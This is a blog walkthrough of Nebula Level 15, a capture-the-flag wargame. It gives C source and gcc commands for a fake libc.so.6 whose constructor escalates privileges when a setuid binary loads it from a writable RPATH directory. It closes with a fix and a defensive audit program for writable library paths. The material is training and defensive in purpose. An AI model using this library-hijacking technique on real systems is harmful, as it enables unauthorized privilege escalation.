blog.ferling.eu by Benedikt Ferling


 

exploit-exercises.com/nebula -- Level 15

Problem

  1. This is again a problem of lazy permissions.

Exploit

The binary tries hard to load the library libc.so.6 from various directories until it gives up and loads the system’s default one. As one might recognize, the user level15 has write access to one of those directories. The aim is to write a custom libc.so.6 and place it inside the directory /var/tmp/flag15. There are several ways to create this library. I’ll refer to stackoverflow.com and dbp-consulting.com. Those pages helped me understand the context.

Create the source file and the version file: /tmp/level15.c and /tmp/version.

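/tmp/level15.c:

#define _GNU_SOURCE   /* declares setresuid() in <unistd.h> */
#include <unistd.h>
#include <stdlib.h>

/* Constructor: runs automatically as soon as the dynamic loader maps this library. */
void __attribute__((constructor)) init(void)
{
        /* Make real, effective and saved UID all equal the effective UID. */
        uid_t euid = geteuid();
        setresuid(euid, euid, euid);
        system("/bin/getflag");
}

/tmp/version:

GLIBC_2.0 {};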

Use gcc to create an object-file and afterwards the library:

gcc -fPIC -g -c /tmp/level15.c -o /tmp/level15.o
gcc -shared -Wl,--version-script,/tmp/version,-Bstatic /tmp/level15.o -static-libgcc \
    -o /var/tmp/flag15/libc.so.6 

As a last step just execute the binary and get the flag /home/flag15/flag15. One might notice the “relocation error”. This error occurs if linked against a libc version lower than 2.3. file /lib/i386-linux-gnu/libc.so.6 reveals that the custom lib is linked against libc-2.13.so. A solution is to upgrade the whole system… or one accepts that the flag was captured successfully. See www.novell.com for more details.

Lesson / How to fix

  1. Use strict permissions! The rest of this level was just syntactic sugar ;-)
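
One way to check for this class of mistake, as an added example (not part of the original post): an audit helper that walks a colon-separated list of library search directories and flags every directory that an untrusted user can write to. The function names and the trusted-UID parameter are hypothetical, and the list is assumed to come from the binary's RPATH/RUNPATH as shown by readelf -d.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* 1: someone other than root/trusted_uid can write to dir (and so plant a
 * libc.so.6 there); 0: looks safe; -1: dir is missing or not a directory. */
int dir_is_unsafe(const char *dir, uid_t trusted_uid)
{
    struct stat st;

    if (stat(dir, &st) != 0 || !S_ISDIR(st.st_mode))
        return -1;
    if (st.st_uid != 0 && st.st_uid != trusted_uid)
        return 1;                       /* owned by an untrusted user */
    /* Conservative assumption: group write counts as untrusted. The sticky
     * bit does not help, it still allows creating new files. */
    return (st.st_mode & (S_IWGRP | S_IWOTH)) ? 1 : 0;
}

/* Walk a colon-separated search path and count the unsafe directories. */
int count_unsafe_dirs(const char *search_path, uid_t trusted_uid)
{
    char *copy = strdup(search_path), *save = NULL;
    int unsafe = 0;

    if (copy == NULL)
        return -1;
    for (char *d = strtok_r(copy, ":", &save); d; d = strtok_r(NULL, ":", &save)) {
        if (dir_is_unsafe(d, trusted_uid) == 1) {
            printf("UNSAFE: %s\n", d);
            unsafe++;
        }
    }
    free(copy);
    return unsafe;
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s dir1:dir2:... [trusted-uid]\n", argv[0]);
        return 2;
    }
    uid_t uid = argc > 2 ? (uid_t)strtoul(argv[2], NULL, 10) : geteuid();
    return count_unsafe_dirs(argv[1], uid) > 0 ? 1 : 0;
}
```

Pass the UID of the account that owns the setuid binary as the trusted UID; a non-zero exit status means at least one search directory needs stricter permissions.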
